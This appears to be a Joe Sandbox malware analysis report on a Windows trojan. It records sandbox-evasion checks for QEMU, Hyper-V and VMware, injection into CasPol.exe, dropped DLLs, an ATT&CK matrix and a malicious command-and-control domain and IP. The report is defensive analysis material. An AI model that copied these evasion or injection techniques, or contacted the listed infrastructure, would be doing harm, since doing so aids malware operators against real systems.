      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, 00000002.00000002.213833441632.0000000002B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, 00000002.00000002.213833441632.0000000002B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 5800Thread sleep time: -1844674407370954s >= -30000sJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 5448Thread sleep time: -220000s >= -30000sJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\NMDllHost.exeJump to dropped file
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\athcfg20U.dllJump to dropped file
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Lib.Platform.Windows.Native.dllJump to dropped file
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\System.Net.Http.dllJump to dropped file
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_02A49279 rdtsc 2_2_02A49279
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWindow / User API: threadDelayed 441Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWindow / User API: threadDelayed 1054Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWindow / User API: foregroundWindowGot 1422Jump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeFile opened / queried: C:\Users\user\AppData\Local\Temp\vmmemctl.infJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_00405C49
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_00406873 FindFirstFileW,FindClose,2_2_00406873
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_0040290B FindFirstFileW,2_2_0040290B
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeAPI call chain: ExitProcess graph end nodegraph_2-9298
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeAPI call chain: ExitProcess graph end nodegraph_2-9294
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System\06e54f5fa1f15dd558eaf403cdcacad3\System.ni.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\5085e86702d2182b0d9417971c65ded2\System.Drawing.ni.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\ae952be8fa59744d6333aed90b72f162\System.Windows.Forms.ni.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Jump to behavior
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, 00000002.00000002.213833759841.00000000046A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: vmmemctl.inf.2.drBinary or memory string: loc.Disk1 = "VMMemCtl Source Media"
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, 00000002.00000002.213833759841.00000000046A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: vmmemctl.inf.2.drBinary or memory string: [VMMemCtl.DriverFiles]
      Source: vmmemctl.inf.2.drBinary or memory string: DriverPackageDisplayName = %loc.VMMemCtlServiceDisplayName%
      Source: vmmemctl.inf.2.drBinary or memory string: loc.VMMemCtlServiceDisplayName = "Memory Control Driver"
      Source: vmmemctl.inf.2.drBinary or memory string: DelService = %VMMemCtlServiceName%,0x204
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, 00000002.00000002.213833759841.00000000046A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: vmmemctl.inf.2.drBinary or memory string: CatalogFile = vmmemctl.cat
      Source: CasPol.exe, 00000004.00000003.214076072577.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.214141105918.00000000007D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: CasPol.exe, 00000004.00000003.214140465902.0000000000792000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.214075728029.0000000000792000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWhy}%SystemRoot%\system32\mswsock.dll
      Source: vmmemctl.inf.2.drBinary or memory string: [VMMemCtl.Service]
      Source: vmmemctl.inf.2.drBinary or memory string: vmmemctl.sys
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, 00000002.00000002.213833441632.0000000002B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: vmmemctl.inf.2.drBinary or memory string: [VMMemCtl.AddRegistry]
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, 00000002.00000002.213833759841.00000000046A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, 00000002.00000002.213833441632.0000000002B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v2.0.50727\caspol.exewindir=\syswow64\iertutil.dll
      Source: vmmemctl.inf.2.drBinary or memory string: VMwareProvider = "VMware, Inc."
      Source: vmmemctl.inf.2.drBinary or memory string: ServiceBinary = %12%\vmmemctl.sys ;%windir%\system32\drivers\vmmemctl.sys
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, 00000002.00000002.213833759841.00000000046A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: vmmemctl.inf.2.drBinary or memory string: DisplayName = %loc.VMMemCtlServiceDisplayName%
      Source: vmmemctl.inf.2.drBinary or memory string: DelFiles = VMMemCtl.DriverFiles
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, 00000002.00000002.213833759841.00000000046A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
      Source: vmmemctl.inf.2.drBinary or memory string: CopyFiles = VMMemCtl.DriverFiles
      Source: vmmemctl.inf.2.drBinary or memory string: AddReg = VMMemCtl.AddRegistry
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, 00000002.00000002.213833759841.00000000046A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: vmmemctl.inf.2.drBinary or memory string: DelReg = VMMemCtl.DelRegistry
      Source: vmmemctl.inf.2.drBinary or memory string: VMMemCtlServiceName = "VMMemCtl"
      Source: vmmemctl.inf.2.drBinary or memory string: vmmemctl.sys = 1
      Source: vmmemctl.inf.2.drBinary or memory string: OptionDesc = %loc.VMMemCtlServiceDesc%
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, 00000002.00000002.213833759841.00000000046A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
      Source: vmmemctl.inf.2.drBinary or memory string: loc.VMMemCtlServiceDesc = "Driver to provide enhanced memory management of this virtual machine."
      Source: vmmemctl.inf.2.drBinary or memory string: ; Copyright (c) 1999-2019 VMware, Inc. All rights reserved.
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, 00000002.00000002.213833759841.00000000046A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: vmmemctl.inf.2.drBinary or memory string: [VMMemCtl.DelRegistry]
      Source: vmmemctl.inf.2.drBinary or memory string: AddService = %VMMemCtlServiceName%,0x800,VMMemCtl.Service ; SPSVCINST_STARTSERVICE
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, 00000002.00000002.213833759841.00000000046A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: vmmemctl.inf.2.drBinary or memory string: ; vmmemctl.inf
      Source: vmmemctl.inf.2.drBinary or memory string: Description = %loc.VMMemCtlServiceDesc%
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, 00000002.00000002.213833759841.00000000046A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
      Source: vmmemctl.inf.2.drBinary or memory string: Provider = %VMwareProvider%
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_6FE01BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,2_2_6FE01BFF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_02A49279 rdtsc 2_2_02A49279
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_02A56045 mov eax, dword ptr fs:[00000030h]2_2_02A56045
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_02A5784A mov eax, dword ptr fs:[00000030h]2_2_02A5784A
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_02A5570E mov eax, dword ptr fs:[00000030h]2_2_02A5570E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_02A4CB44 mov eax, dword ptr fs:[00000030h]2_2_02A4CB44
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe base: 630000Jump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe" Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_0040352D
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts1
      Native API
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      1
      Disable or Modify Tools
      OS Credential Dumping4
      File and Directory Discovery
      Remote Services11
      Archive Collected Data
      Exfiltration Over Other Network Medium1
      Ingress Tool Transfer
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      System Shutdown/Reboot
      Default Accounts1
      Scheduled Task/Job
      1
      Windows Service
      1
      Access Token Manipulation
      1
      Obfuscated Files or Information
      LSASS Memory5
      System Information Discovery
      Remote Desktop Protocol1
      Clipboard Data
      Exfiltration Over Bluetooth11
      Encrypted Channel
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)1
      Scheduled Task/Job
      1
      Windows Service
      1
      DLL Side-Loading
      Security Account Manager231
      Security Software Discovery
      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
      Non-Standard Port
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)1
      Registry Run Keys / Startup Folder
      111
      Process Injection
      1
      Masquerading
      NTDS1
      Process Discovery
      Distributed Component Object ModelInput CaptureScheduled Transfer2
      Non-Application Layer Protocol
      SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon Script1
      Scheduled Task/Job
      141
      Virtualization/Sandbox Evasion
      LSA Secrets141
      Virtualization/Sandbox Evasion
      SSHKeyloggingData Transfer Size Limits113
      Application Layer Protocol
      Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.common1
      Registry Run Keys / Startup Folder
      1
      Access Token Manipulation
      Cached Domain Credentials1
      Application Window Discovery
      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items111
      Process Injection
      DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
      Hidden Files and Directories
      Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      SecuriteInfo.com.W32.AIDetect.malware2.23037.exe10%VirustotalBrowse
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\Lib.Platform.Windows.Native.dll0%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\Lib.Platform.Windows.Native.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\NMDllHost.exe0%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\NMDllHost.exe0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\System.Net.Http.dll0%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\System.Net.Http.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\athcfg20U.dll0%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\athcfg20U.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll3%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t1%VirustotalBrowse
      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%Avira URL Cloudsafe
      https://sectigo.com/CPS00%VirustotalBrowse
      https://sectigo.com/CPS00%Avira URL Cloudsafe
      http://ocsp.sectigo.com00%Avira URL Cloudsafe
      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#1%VirustotalBrowse
      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%Avira URL Cloudsafe
      http://ocsp.thawte.com00%Avira URL Cloudsafe
      https://sectigo.com/CPS0D0%Avira URL Cloudsafe
      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%Avira URL Cloudsafe
      http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      timenamoney.ooguy.com
      23.105.131.228
      truetrue
        unknown
        cdn.discordapp.com
        162.159.129.233
        truefalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tLib.Platform.Windows.Native.dll.2.drfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://cdn.discordapp.com/dQCasPol.exe, 00000004.00000003.214140465902.0000000000792000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.214075728029.0000000000792000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            https://sectigo.com/CPS0Lib.Platform.Windows.Native.dll.2.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://crl.thawte.com/ThawteTimestampingCA.crl0NMDllHost.exe.2.drfalse
              high
              http://ocsp.sectigo.com0Lib.Platform.Windows.Native.dll.2.drfalse
              • Avira URL Cloud: safe
              unknown
              http://www.symauth.com/rpa00NMDllHost.exe.2.drfalse
                high
                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#Lib.Platform.Windows.Native.dll.2.drfalse
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://ocsp.thawte.com0NMDllHost.exe.2.drfalse
                • Avira URL Cloud: safe
                unknown
                http://www.nero.comNMDllHost.exe.2.drfalse
                  high
                  https://cdn.discordapp.com/LQ%CasPol.exe, 00000004.00000003.214140465902.0000000000792000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.214075728029.0000000000792000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://sectigo.com/CPS0DLib.Platform.Windows.Native.dll.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sLib.Platform.Windows.Native.dll.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://cdn.discordapp.com/CasPol.exe, 00000004.00000003.214075868688.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.214140695527.00000000007AE000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://scripts.sil.org/OFLSourceSourceCodePro-Medium.otf.2.drfalse
                        high
                        http://nsis.sf.net/NSIS_ErrorErrorSecuriteInfo.com.W32.AIDetect.malware2.23037.exe, Militrpoliti2.exe.4.drfalse
                          high
                          http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#Lib.Platform.Windows.Native.dll.2.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.symauth.com/cps0(NMDllHost.exe.2.drfalse
                            high
                            https://curl.haxx.se/docs/http-cookies.htmlLib.Platform.Windows.Native.dll.2.drfalse
                              high
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              23.105.131.228
                              timenamoney.ooguy.comUnited States
                              396362LEASEWEB-USA-NYC-11UStrue
                              162.159.129.233
                              cdn.discordapp.comUnited States
                              13335CLOUDFLARENETUSfalse
                              Joe Sandbox Version:34.0.0 Boulder Opal
                              Analysis ID:634855
                              Start date and time: 26/05/202222:53:542022-05-26 22:53:54 +02:00
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 13m 25s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:SecuriteInfo.com.W32.AIDetect.malware2.23037.exe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                              Run name:Suspected Instruction Hammering
                              Number of analysed new started processes analysed:16
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@4/19@78/2
                              EGA Information:
                              • Successful, ratio: 100%
                              HDC Information:
                              • Successful, ratio: 48.3% (good quality ratio 47.6%)
                              • Quality average: 86.8%
                              • Quality standard deviation: 21.4%
                              HCA Information:
                              • Successful, ratio: 95%
                              • Number of executed functions: 62
                              • Number of non-executed functions: 37
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Adjust boot time
                              • Enable AMSI
                              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                              • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, wdcpalt.microsoft.com, client.wns.windows.com, ctldl.windowsupdate.com, wdcp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtSetInformationFile calls found.
                              TimeTypeDescription
